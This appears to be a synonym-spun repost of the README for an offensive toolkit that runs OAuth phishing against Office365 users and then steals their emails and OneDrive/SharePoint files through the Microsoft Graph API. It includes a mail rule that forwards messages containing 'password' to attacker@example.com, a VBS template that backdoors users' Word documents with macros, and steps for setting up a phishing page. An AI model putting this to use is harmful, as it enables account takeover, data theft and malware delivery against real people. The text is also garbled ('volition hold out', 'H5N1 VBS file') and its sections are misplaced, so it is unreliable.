O365-Attack-Toolkit - A Toolkit To Assault Office365

o365-attack-toolkit allows operators to perform an OAuth phishing assail in addition to afterward on usage the Microsoft Graph API to extract interesting information.
Some of the implemented features are :
  • Extraction of keyworded e-mails from Outlook.
  • Creation of Outlook Rules.
  • Extraction of files from OneDrive/Sharepoint.
  • Injection of macros on Word documents.

Architecture


The toolkit consists of several components

Phishing endpoint
The phishing endpoint is responsible for serving the HTML file that performs the OAuth token phishing.

Backend services
Afterward, the token volition hold out used past times the backend services to perform the defined attacks.

Management interface
The management interface tin hold out utilized to inspect the extracted information from the Microsoft Graph API.

Features

Outlook Keyworded Extraction
User emails tin hold out extracted past times this toolkit using keywords. For every defined keyword inward the configuration file, all the emails that agree them volition hold out downloaded in addition to saved inward the database. The operator tin inspect the downloaded emails through the administration interface.

Onedrive/Sharepoint Keyworded Extraction
Microsoft Graph API tin hold out used to access files across OneDrive, OneDrive for Business in addition to SharePoint document libraries. User files tin hold out extracted past times this toolkit using keywords. For every defined keyword inward the configuration file, all the documents that agree them volition hold out downloaded in addition to saved locally. The operator tin testify the documents using the administration interface.

Outlook Rules Creation
Microsoft Graph API supports the creation of Outlook rules. You tin define dissimilar rules past times putting the dominion JSON files inward the rules/ folder. https://docs.microsoft.com/en-us/graph/api/mailfolder-post-messagerules?view=graph-rest-1.0&tabs=cs
Below is an instance dominion that when loaded, it volition forrad every electronic mail that contains password inward the torso to attacker@example.com.
{           "displayName": "Example Rule",           "sequence": 2,           "isEnabled": true,               "conditions": {         "bodyContains": [           "password"                ]      },      "actions": {         "forwardTo": [           {              "emailAddress": {                 "name": "Attacker Email",                 "address": "attacker@example.com"               }            }         ],         "stopProcessingRules": faux      }     }

Word Document Macro Backdooring
Users documents hosted on OneDrive tin hold out backdoored past times injecting macros. If this characteristic is enabled, the terminal xv documents accessed past times the user volition hold out downloaded in addition to backdoored alongside the macro defined inward the configuration file. After the backdoored file has been uploaded, the extension of the document volition hold out changed to .doc inward fellowship for the macro to hold out supported on Word. It should hold out noted that after backdooring the documents, they tin non hold out edited online which increases the chances of our payload execution.
This functionality tin solely hold out used on Windows because the insertion of macros is done using the Word COM object. H5N1 VBS file is built past times the template below in addition to executed in addition to then don't panic if y'all encounter wscript.exe running.
 Dim wdApp   Set wdApp = CreateObject("Word.Application")   wdApp.Documents.Open("{DOCUMENT}")   wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "{MACRO}"   wdApp.Documents(1).SaveAs2 "{OUTPUT}", 0   wdApp.Quit  

How to laid up

Compile
 Dim wdApp  Set wdApp = CreateObject("Word.Application")  wdApp.Documents.Open("{DOCUMENT}")  wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "{MACRO}"  wdApp.Documents(1).SaveAs2 "{OUTPUT}", 0  wdApp.Quit

Configuration
An instance configuration equally below :
cd %GOPATH% git clone https://github.com/0x09AL/o365-attack-toolkit cd o365-attack-toolkit dep ensure become build

Deployment
Before firstly using this toolkit y'all involve to practice an Application on the Azure Portal. Go to Azure Active Directory -> App Registrations -> Register an application.


After creating the application, re-create the Application ID in addition to modify it on static/index.html.
The URL(external listener) that volition hold out used for phishing should hold out added equally a Redirect URL. To add together a redirect url, become the application in addition to click Add a Redirect URL.


The Redirect URL should hold out the URL that volition hold out used to host the phishing endpoint, inward this instance https://myphishingurl.com/


Make certain to cheque both the boxes equally shown below :


It should hold out noted that y'all tin run this tool on whatsoever Operating Systems that Go supports, only the Macro Backdooring Functionality volition solely piece of employment on Windows.
The expect of the phishing page tin hold out changed on static/index.html.

Security Considerations
Apart from all the features this tool has, it also opens about assail surface on the host running the tool. Firstly, the Macro Backdooring Functionality volition opened upwardly the give-and-take files, in addition to if y'all are running an unpatched version of Office, bad things tin happen. Additionally, the extraction of files tin download malicious files which volition hold out saved on your computer.
The best approach would hold out isolating the host properly in addition to solely allowing communication alongside the HTTPS redirector in addition to Microsoft Graph API.

Management Interface
The administration interface allows the operator to browse the information that has been extracted.

Users view


View User Emails


View Email